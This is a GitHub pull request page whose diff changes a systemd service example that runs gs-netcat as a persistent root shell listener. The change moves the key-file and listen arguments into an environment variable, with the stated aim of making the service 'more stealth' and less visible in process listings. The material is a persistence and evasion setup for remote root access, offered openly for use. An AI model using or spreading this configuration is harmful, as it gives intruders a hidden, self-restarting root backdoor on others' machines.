Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

start service with environment variable to make it more stealth #108

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 2 additions & 1 deletion examples/systemd-root-shell/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -18,11 +18,12 @@ Description=Global Socket Root Shell
After=network.target

[Service]
Environment="GS_ARGS=-k /etc/systemd/gs-root-shell-key.txt -il"
Type=simple
Restart=always
RestartSec=10
WorkingDirectory=/root
ExecStart=gs-netcat -k /etc/systemd/gs-root-shell-key.txt -il
ExecStart=gs-netcat

[Install]
WantedBy=multi-user.target
Expand Down
3 changes: 2 additions & 1 deletion examples/systemd-root-shell/gs-root-shell.service
Original file line number Diff line number Diff line change
Expand Up @@ -3,11 +3,12 @@ Description=Global Socket Root Shell
After=network.target

[Service]
Environment="GS_ARGS=-k /etc/systemd/gs-root-shell-key.txt -il"
Type=simple
Restart=always
RestartSec=10
WorkingDirectory=/root
ExecStart=gs-netcat -k /etc/systemd/gs-root-shell-key.txt -il
ExecStart=gs-netcat

[Install]
WantedBy=multi-user.target